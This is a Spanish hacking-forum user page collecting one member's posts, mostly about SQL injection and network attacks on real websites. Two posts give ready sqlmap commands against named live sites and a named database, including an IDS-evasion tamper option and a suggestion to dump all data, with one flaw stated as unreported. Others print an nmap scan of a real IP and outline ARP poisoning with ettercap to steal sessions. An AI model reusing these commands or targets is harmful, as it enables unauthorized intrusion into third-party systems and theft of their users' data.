Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - charly837

#1
Bueno pues como ayer , estoy en plan malvado  ;D ;D ;D ;D ;D en busqueda de vulnerabilidades en mi afan de aprender mucho sobre el sqlmap, las inyecciones sql y Xss, encontre otra web que expongo a continuacion:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

la vulnerabilidad se encuentra en:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'

comando de sqlmap :

Código: php

sqlmap.py -u "http://www.nsche.org.ng/communiquedetail.php?ID=" --dbms="MySQL" --risk 1 --level 1 --dbs





Como veis he censurado algunas partes ya que como ayer bien se me dijo es informacion sensible, y es verdad, por tanto no la muestro, ya que el que sepa meter esto, sacar el nombre de la bbdd es pan comido, esta bbdd tiene 86 tablas como esta hay puesto, dentro de una de ellas te puedes encontrar users, yo no he probado a loguearme , asique eso cada uno con su responsabilidad...  :-\ :-\ :-\ :-\

La web tiene pinta de estar ya abandona... esa es mi impresion pero bueno, notifique el fallo al admin de la web mediante No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

asique nada mas , que espero q resulte interesante , un saludete a todos  :D :D :D :D

#2
Ya he reportado la vulnerabilidad a la pagina web a traves de su correo de contacto, Ya en sus manos queda...
#3
Os pongo el reporte del nmap que resulta bastante interesante, direis porque usa los parametros -O y -A al mismo tiemop pues nose tengo manias...  ;D ;D ;D ;D ;D

Código: php

[*] exec: nmap -sS -PN -O 184.71.243.98 -A -sC


Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-08 15:35 EDT
Nmap scan report for 184.71.243.98
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.2.14 ((Ubuntu))
|_http-title: Home
443/tcp open  ssl/http Apache httpd 2.2.14
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title (text/plain).
| ssl-cert: Subject: commonName=*.idocz.net
| Not valid before: 2014-02-26T13:59:42+00:00
|_Not valid after:  2015-04-02T02:26:31+00:00
|_ssl-date: 2014-05-08T17:27:37+00:00; -2h09m16s from local time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.32 - 2.6.33 (87%), Linux 2.6.32 - 2.6.35 (87%), Linux 2.6.31 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: Host: pass.idocz.net

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   3.70 ms   192.168.0.1
2   11.03 ms  10.219.32.1
3   13.43 ms  10.127.44.125
4   22.75 ms  10.207.243.53
5   12.49 ms  10.254.5.110
6   13.74 ms  mad-b2-link.telia.net (80.239.160.81)
7   118.82 ms prs-bb2-link.telia.net (80.91.245.60)
8   145.40 ms nyk-bb1-link.telia.net (80.91.253.122)
9   140.56 ms chi-bb1-link.telia.net (213.155.136.19)
10  138.85 ms shawbusiness-ic-300305-chi-eqx-i1.c.telia.net (62.115.12.90)
11  148.43 ms rc2nr-hge0-9-0-0.wp.shawcable.net (66.163.77.201)
12  172.47 ms rc3no-tge0-11-0-11.cg.shawcable.net (66.163.64.173)
13  189.71 ms dx2dt-te3.cg.shawcable.net (64.59.132.158)
14  224.01 ms 184.71.243.98

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.28 seconds
#4
No, todavia no se lo he reportado, acabo de editar el post poniendo eso precisamente  :D :D :D :D
#5
Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:

Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'



Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas

C:\sqlmap>sqlmap.py -u "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash"  -D idocz_web --tables



utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.

me interese un poco en la version de apache que tiene el servidor que es la  Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y la lista completa para esa version de apache 2.2.14 es:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

nose si serva vulnerable a todos pero alguno seguro!!

He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!

la vulnerabilidad no ha sido reportada.

Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo  :D :D :D :D, gracias a todos por este foro!

#6
Phreak / Re:Ataques BlueBug
Noviembre 06, 2013, 12:20:03 AM
La leche !! Me acabo de terminar de leerlo y me falta tiempo para probarlo, y ver de que es capaz mi Bluetooth del pc porque me he quedado realmente sorprendido , también se podrían por ejemplo enviarle asi por decir una imagen troyanizada o un qrcode troyanizado y que lo ejecutará o dejarle un backdoor ? He visto pequeñas aplicaciones en androide o el famoso java aplet infectado "Maqueado" para moviles pero esto lo veo mucho más agresivo la verdad, muchas gracias por la info !!
#7
Hacking / Hablando de BEAST
Noviembre 05, 2013, 10:19:11 PM
Bueno supongo que lo conoceis todos dado que ya no es nada nuevo pero bueno, pongo la definicion buscada en google que suele venir por todos los lados.

Browser Exploit Against SSL/TLS (vulnerabilidad del navegador en SSL/TLS).

he estado indagando la verdad que un poco porque me ha resultado excitante el tema y he visto que ya hay una version nueva que rompe el TLSv1.2 dado que la gran mayoría de certificados se vasa en el, pues bueno me gustaría realizar un PoC, pero no he llegado a encontrar o no he buscado bien el BEAST que es el script que rompe el cifrado, mi pregunta es: ¿sabeis donde puedo encontrarlo?, ¿El ssl strip ya ha implementado este metodo? porque la verdad las ultimas veces que yo lo usaba no ha servido para mucho.

Y bueno ya pongo en comun ideas , lo que tenia planteado seria si encuentro el BEAST un envenenamiento ARP y con el urlsnarf o el ettercap en modo -T -q -p -M arp // // para el robo de sesiones y luego la desencriptacion con el BEAST , porque estuve probando el hamster y ferret pero me parece muy tosca la interfaz y para "lo que hace" prefiero hacerlo mas "artesanalme", ¿como lo ven?
Un saludo.
#8
Uno mas que se apunta , por cierto , hola a todos !!